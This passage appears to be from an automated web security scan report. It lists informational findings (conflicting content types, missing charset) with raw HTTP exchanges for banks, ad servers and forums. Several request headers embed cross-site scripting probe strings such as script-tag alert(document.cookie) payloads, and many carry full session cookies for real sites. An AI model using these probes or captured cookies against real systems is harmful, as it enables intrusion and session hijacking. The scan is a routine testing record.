HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:30:08 GMT
Server: IBM_HTTP_Server
Last-Modified: Mon, 31 Jan 2011 18:26:28 GMT
ETag: "243a-4bdd-8dde5d00"
Accept-Ranges: bytes
Content-Length: 19421
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns:xalan="http://xml.apache.org/xalan" xmlns:java="http://xml.apache.o
...[SNIP]...

23.175. https://www2.bankofamerica.com/cferror.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.bankofamerica.com
Path:   /cferror.cgi

Request

POST /cferror.cgi HTTP/1.1
Host: www2.bankofamerica.com
Connection: keep-alive
Referer: https://www2.bankofamerica.com/promos/jump/greatdeals/?3bb0e%22%20a%3db%20b8409311022=1
Cache-Control: max-age=0
Origin: https://www2.bankofamerica.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=D98FA69C2F17102F856AA91CC30F81BB; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmTPSet=Y; TCID=0007ae71-9ad3-3b5c-9719-884700000028; NSC_CbolPgBnfsjdb=445b32097852; throttle_value=21; SMIDENTITY=PsA0HylVqqaqeyp2eMZicNCxJ5yXmFqWoP6mwBuZTOzvqaaTDkSwusUt87wIMt8yw2jjZe2uz0c9qvYWnG5IzjpCeJGlDNniEsMBfj1RLXbnE934lvGx4s6FDAlOpYOeX7mXH/X1dATmjlTEA7peFaYQMTBsGOe3ssml7oOAUfHWD93UMAkbPmp57uTRMf4hzPBfBBVvBqkkkFVyIN5oX1VTt4P79m/dU6MatOqH1bZdlrDN8rr72JAU7eFjp/sazTaPmxrLXFVHkmLtv1jJtCtkOgfV8GmXuScS7bGqbWMI6fOk2xWv/vnB8clClkIqoHDBT+3zh6PtJ5IuXdeLhMy3yziu6VgswrJTq4nnGkT1rSXqeCvUiAnW8lJiQ8/rR+aB7nWeu9z3uJWZxXHr18caM0EqiD/c+SAFaE+DYMjHQ0mbdsgs1FuqeLjIx9STNpx3K2zq/aPEGsqCAelWm4sPN0qbtTsQnF3YWNBTDg0eRBe62pWODGxKIDrwQUkv
Content-Length: 658

URL=https%3A%2F%2Fwww2.bankofamerica.com%2Fpromos%2Fjump%2Fgreatdeals%2F%3F3bb0e%2522%2520a%253db%2520b8409311022%3D1&DateTime=Wed+Feb+02+22%3A30%3A31+2011&Template=%2Fwww%2Fbankofamerica%2Fsecure-dat
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:32:18 GMT
Content-type: text/html
P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi"
Connection: close
Content-Length: 18987

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<meta name="Description" content="Page
...[SNIP]...

23.176. https://www2.bankofamerica.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.bankofamerica.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www2.bankofamerica.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=D98FA69C2F17102F856AA91CC30F81BB; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmTPSet=Y; cmRS=t3=1296686185861&pi=AboutBAC%3AHelp%3APageNotFound%3BCF-HTTPS-PageNotFound; TCID=0007ae71-9ad3-3b5c-9719-884700000028; NSC_CbolPgBnfsjdb=445b32097852; throttle_value=21; SMIDENTITY=PsA0HylVqqaqeyp2eMZicNCxJ5yXmFqWoP6mwBuZTOzvqaaTDkSwusUt87wIMt8yw2jjZe2uz0c9qvYWnG5IzjpCeJGlDNniEsMBfj1RLXbnE934lvGx4s6FDAlOpYOeX7mXH/X1dATmjlTEA7peFaYQMTBsGOe3ssml7oOAUfHWD93UMAkbPmp57uTRMf4hzPBfBBVvBqkkkFVyIN5oX1VTt4P79m/dU6MatOqH1bZdlrDN8rr72JAU7eFjp/sazTaPmxrLXFVHkmLtv1jJtCtkOgfV8GmXuScS7bGqbWMI6fOk2xWv/vnB8clClkIqoHDBT+3zh6PtJ5IuXdeLhMy3yziu6VgswrJTq4nnGkT1rSXqeCvUiAnW8lJiQ8/rR+aB7nWeu9z3uJWZxXHr18caM0EqiD/c+SAFaE+DYMjHQ0mbdsgs1FuqeLjIx9STNpx3K2zq/aPEGsqCAelWm4sPN0qbtTsQnF3YWNBTDg0eRBe62pWODGxKIDrwQUkv

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 03 Feb 2011 01:31:46 GMT
Content-length: 1406
Content-type: text/plain
Last-modified: Thu, 18 Nov 2004 15:00:26 GMT
Etag: "57e-419cb90a"
Accept-ranges: bytes
Connection: close

..............h.......(....... ...........@...............................................................................................................k...H...%............z...b...Js..2P...........
...[SNIP]...

23.177. https://www3.financialtrans.com/tf/FANWeb  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www3.financialtrans.com
Path:   /tf/FANWeb

Request

GET /tf/FANWeb HTTP/1.1
Host: www3.financialtrans.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server:
Date: Wed, 02 Feb 2011 22:30:12 GMT
Content-length: 211
Content-type: text/html; charset=ISO-8859-1
Connection: close

<html><head><title>Online Transaction Error
</title></head>
<body><center><h1>Online Transaction Error</h1><hr><h3>
<p><p>A fatal error has occurred. Check nohup for error details.
<p><hr><center></bo
...[SNIP]...

24. Multiple content types specified  previous  next
There are 2 instances of this issue:

Issue background

If a web response specifies multiple incompatible content types, then the browser will usually analyse the response and attempt to determine the actual MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of multiple incompatible content type statements does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


24.1. http://sr2.liveperson.net/visitor/addons/deploy.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sr2.liveperson.net
Path:   /visitor/addons/deploy.asp

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Request

GET /visitor/addons/deploy.asp?site=44850650&d_id=MLDIra HTTP/1.1
Host: sr2.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.retirement.merrilledge.com/IRA/pages/home.aspx?%009627c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eac0806a009c=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101423669632,d=1294435351

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
max-age: 1800
Last-Modified: Tue, 14 Jul 2009 13:04:47 GMT
Content-Type: application/x-javascript
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: public, max-age=21585
Date: Wed, 02 Feb 2011 22:21:34 GMT
Connection: close
Content-Length: 20

lpAddMonitorTag();

24.2. http://switchboard.nrdc.org/blogs/lsuatoni/the_evaluation_of_deepwater_ho.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://switchboard.nrdc.org
Path:   /blogs/lsuatoni/the_evaluation_of_deepwater_ho.html

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Request

GET /blogs/lsuatoni/the_evaluation_of_deepwater_ho.html HTTP/1.1
Host: switchboard.nrdc.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:05:01 GMT
Server: Apache/2.0.52 (Red Hat)
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35677

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http:
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Switchboard, from NRDC | Lisa Suatoni's Blog" href="http://rss.nrdcfeeds.org/switchboard_lsuatoni";>

<meta http-equiv="content-type" content="charset=utf-8" />
<meta name="robots" content="all" />
...[SNIP]...

25. HTML does not specify charset  previous  next
There are 125 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


25.1. http://a.tribalfusion.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /

Request

GET / HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ain4xBt3erwAAxv5ACp5UsSCfRTc3eDBInJG6dCqycdA6CDkJUEE1FO3EEFaEMQCKewFpZaiZbJPZc95uCNmeLsZb1q5TrVkYqQRO9guZdb5GrmBn7HFLUiYT9lsvPNmaqZdFMDMrt7xSx1ITHIQVytDmQMe5eljYPUnO1WYEI6jrVrJGuVKbhbbMorcetYvupZb9oZcUXSt9cICE4WBOxtnZdhmOfKCgbyrFyA6hb4y5TnMNrYDcgNZdNDJbJg8hFmFZb8YdUv8nNebjJ1fanP2uupDhsCWD8HUHZb5Qbh8MJ0qr2ju5Ht9lw2gi0jIQMHHZauZbFLtYbbtsDUCrTEHqESCIg;

Response

HTTP/1.1 404 Not Found
X-Function: 409
X-Reuse-Index: 1
Content-Type: text/html
Content-Length: 140
Connection: Close

<html><head><title>404 Not Found</title></head>
<body><h1>404 Not Found </h1>The requested url was not found on this server.
</body></html>

25.2. http://a.tribalfusion.com/j.ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Request

GET /j.ad HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ain4xBt3erwAAxv5ACp5UsSCfRTc3eDBInJG6dCqycdA6CDkJUEE1FO3EEFaEMQCKewFpZaiZbJPZc95uCNmeLsZb1q5TrVkYqQRO9guZdb5GrmBn7HFLUiYT9lsvPNmaqZdFMDMrt7xSx1ITHIQVytDmQMe5eljYPUnO1WYEI6jrVrJGuVKbhbbMorcetYvupZb9oZcUXSt9cICE4WBOxtnZdhmOfKCgbyrFyA6hb4y5TnMNrYDcgNZdNDJbJg8hFmFZb8YdUv8nNebjJ1fanP2uupDhsCWD8HUHZb5Qbh8MJ0qr2ju5Ht9lw2gi0jIQMHHZauZbFLtYbbtsDUCrTEHqESCIg;

Response

HTTP/1.1 404 Not Found
X-Function: 409
X-Reuse-Index: 1
Content-Type: text/html
Content-Length: 140
Connection: Close

<html><head><title>404 Not Found</title></head>
<body><h1>404 Not Found </h1>The requested url was not found on this server.
</body></html>

25.3. http://ad.thehill.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.thehill.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: ad.thehill.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAVARS[default]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A4%3A%222187%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A3%3A%22138%22%3Bs%3A6%3A%22oadest%22%3Bs%3A0%3A%22%22%3B%7D; __qca=P0-629275191-1296696399668; __utmz=121351885.1296696400.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; __utma=121351885.1499307976.1296696400.1296696400.1296696400.1; __utmc=121351885; __utmb=121351885.1.10.1296696400; _OASCCAP[1930]=1; _OACBLOCK[1930]=1296696352; OAID=308f74733f72a0ba99b5c2e36e2aaec4

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Thu, 03 Feb 2011 01:34:19 GMT
Server: lighttpd/1.4.22

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

25.4. http://ai.hitbox.com/ai  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ai.hitbox.com
Path:   /ai

Request

GET /ai?ai=&pageID=null&placementID=CITIP_PORTAL_B_BUCKET_B1_218X88&app=UNSOL&sc=4T3Z1MR0&m=ZCG1MDQ570W&langId=EN&siteId=CB&B=M&screenID=3000&uc=A9J&t=t&hb=DM550608DPBR&r=254495626.3154745 HTTP/1.1
Host: ai.hitbox.com
Proxy-Connection: keep-alive
Referer: http://www.citi.com/domain/home.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WSS_GW=V1z%B^eBB^e%r; CTG=1296229610

Response

HTTP/1.1 400 Bad Request
Date: Wed, 02 Feb 2011 22:00:01 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
nnCoection: close
Pragma: no-cache
Cache-Control: max-age=0, private, proxy-revalidate
Expires: Wed, 02 Feb 2011 22:00:02 GMT
Content-Type: text/html
Content-Length: 58

<html>
<body>
<p>400 Bad Request</p>
</body>
</html>

25.5. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2171139&PluID=0&w=728&h=90&ord=[timestamp]&ucm=true HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://thehill.com/blogs/e2-wire/677-e2-wire650aa'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2295b33377e/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; A3=f+JvabEk02WG00002h5iUabNz07l00000Qh5j3abNz07l00000.gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001fUFGa50V02WG00001gy3.ach00c9M00001cRreabeg03Dk00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001ge4Hack+0bM000001; B3=7lgH0000000001sG89PS000000000QsZ89PT000000000.sZ852G0000000003sS7dNH0000000002sZ7GHq0000000001s.7FCH0000000001s.83xP0000000001sF8cVQ0000000001sV852N0000000001s.87ma0000000001s.6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; eyeblaster=BWVal=408&BWDate=40573.510532&debuglevel=&FLV=10.1103&RES=128&WMPV=0; ActivityInfo=000p81bBo%5f; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=408&BWDate=40573.510532&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Tue, 03-May-2011 20:25:38 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A3=h5j3abNz07l00000.h5iUabNz07l00000Qf+JvabEk02WG00002gNfHaaiN0aVX00001gn3Ka4JO09MY00001fU+La50V0a+r00001gYx+adw90cvM00001fUFGa50V02WG00001gy3.ach00c9M00001cRreabeg03Dk00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001ge4Hack+0bM000001; expires=Tue, 03-May-2011 20:25:38 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=89PS000000000QsZ7lgH0000000001sG89PT000000000.sZ852G0000000003sS7dNH0000000002sZ7GHq0000000001s.7FCH0000000001s.8cVQ0000000001sV83xP0000000001sF852N0000000001s.6o.Q0000000001sY87ma0000000001s.8i430000000001t27gi30000000001sG852z0000000001sS852A0000000001sS; expires=Tue, 03-May-2011 20:25:38 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Tue, 03-May-2011 20:25:38 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 03 Feb 2011 01:25:38 GMT
Connection: close
Content-Length: 1696

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

25.6. https://careers.jpmorganchase.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://careers.jpmorganchase.com
Path:   /

Request

GET / HTTP/1.1
Host: careers.jpmorganchase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:01:51 GMT
Server: Apache
Last-Modified: Tue, 21 Aug 2007 00:43:14 GMT
ETag: "30d02-b1-f13e0c80"
Accept-Ranges: bytes
Content-Length: 177
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Refresh" Content="0; URL=http://careers.jpmorganchase.com/career/careerhome">
</HEAD>

</HTML>

25.7. http://cdn.invisionpower.com/public/min/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.invisionpower.com
Path:   /public/min/index.php

Request

GET /public/min/index.php?ipbv=31007&charset=iso-8859-1&f=public/js/ipb.js,public/js/ips.quickpm.js,public/js/ips.sharelinks.js,public/js/ips.blog.js,public/js/ips.rating.js,public/js/ips.like.js,public/js/ips.hovercard.js,public/js/ips.comments.js,cache/lang_cache/1/ipb.lang.js HTTP/1.1
Host: cdn.invisionpower.com
Proxy-Connection: keep-alive
Referer: http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/?85e9a'%3E%3Cscript%3Ealert(1)%3C/script%3E5b968c91723=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156

Response

HTTP/1.1 504 Gateway Time-out
Content-Length: 415
Content-Type: text/html
Server: Footprint Distributor V4.6
Date: Thu, 03 Feb 2011 01:57:55 GMT
Connection: keep-alive

An HTTP error occurred while getting: <p><strong>http://cdn.invisionpower.com/public/min/index.php?ipbv=31007&charset=iso-8859-1&f=public/js/ipb.js,public/js/ips.quickpm.js,public/js/ips.sharelinks.js
...[SNIP]...

25.8. https://charterone.mortgagewebcenter.com/ApplyNow/Application.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://charterone.mortgagewebcenter.com
Path:   /ApplyNow/Application.asp

Request

GET /ApplyNow/Application.asp HTTP/1.1
Host: charterone.mortgagewebcenter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 21:58:16 GMT
Server: Microsoft-IIS/6.0
P3P: CP="ALL DSP COR CUR IVDi OUR LEG UNI"
Cache-control: no-cache
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
pragma: no-cache
cache-control: no-store, no-cache, must-revalidate
cache-control: post-check=0, pre-check=0
Content-Length: 3006
Content-Type: text/html
Expires: Sat, 18 Jan 1997 18:36:16 GMT
Set-Cookie: bhCookieSaveSess=1; path=/
Set-Cookie: bhCookieSess=1; path=/
Cache-control: no-cache

<HTML xmlns:BHAWK><HEAD><STYLE>@media all { BHAWK\:clientCaps {behavior:url(#default#clientcaps)} }</STYLE>
<!-- These scripts are provided under the terms of the BrowserHawk license agreement
and may
...[SNIP]...

25.9. https://citizensbankri.mortgagewebcenter.com/ApplyNow/Application.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://citizensbankri.mortgagewebcenter.com
Path:   /ApplyNow/Application.asp

Request

GET /ApplyNow/Application.asp HTTP/1.1
Host: citizensbankri.mortgagewebcenter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:09:49 GMT
Server: Microsoft-IIS/6.0
P3P: CP="ALL DSP COR CUR IVDi OUR LEG UNI"
Cache-control: no-cache
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
pragma: no-cache
cache-control: no-store, no-cache, must-revalidate
cache-control: post-check=0, pre-check=0
Content-Length: 3006
Content-Type: text/html
Expires: Sat, 18 Jan 1997 18:36:16 GMT
Set-Cookie: bhCookieSaveSess=1; path=/
Set-Cookie: bhCookieSess=1; path=/
Cache-control: no-cache

<HTML xmlns:BHAWK><HEAD><STYLE>@media all { BHAWK\:clientCaps {behavior:url(#default#clientcaps)} }</STYLE>
<!-- These scripts are provided under the terms of the BrowserHawk license agreement
and may
...[SNIP]...

25.10. http://community.invisionpower.com/clickheat/click.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /clickheat/click.php

Request

GET /clickheat/click.php?s=forums&g=boardindex&x=562&y=200&w=1020&b=chrome&c=1&random=Wed%20Feb%2002%202011%2016:26:40%20GMT-0600%20(Central%20Standard%20Time) HTTP/1.1
Host: community.invisionpower.com
Proxy-Connection: keep-alive
Referer: http://community.invisionpower.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558; cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:25:31 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 568
Content-Type: text/html

<br />
<b>Warning</b>: fopen(/home/forumsi/public_html/clickheat/logs/forums,boardindex/2011-02-02.log) [<a href='function.fopen'>function.fopen</a>]: failed to open stream: Permission denied in <b>/
...[SNIP]...

25.11. http://famspam.com/facebox/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://famspam.com
Path:   /facebox/

Request

GET /facebox/ HTTP/1.1
Host: famspam.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Wed, 02 Feb 2011 22:11:30 GMT
Content-Type: text/html
Content-Length: 291
Last-Modified: Wed, 23 Jun 2010 18:40:47 GMT
Connection: close
Expires: Thu, 03 Feb 2011 22:11:30 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes

<!DOCTYPE html>
<html>
<head>
<title>http://defunkt.github.com/facebox/</title>
<meta http-equiv="refresh" content="0;url=http://defunkt.github.com/facebox/"></head>
<body>
<a href="ht
...[SNIP]...

25.12. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Request

GET /activityi;src=1787495;type=secur715;cat=secur895;ord=9674065019935.37? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://usa.visa.com/personal/security/get-help-now.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Wed, 02 Feb 2011 21:59:36 GMT
Expires: Wed, 02 Feb 2011 21:59:36 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 194

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"></body></html>

25.13. https://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://fls.doubleclick.net
Path:   /activityi

Request

GET /activityi;src=1359940;type=front061;cat=2010b535;ord=1;num=? HTTP/1.1
Host: fls.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
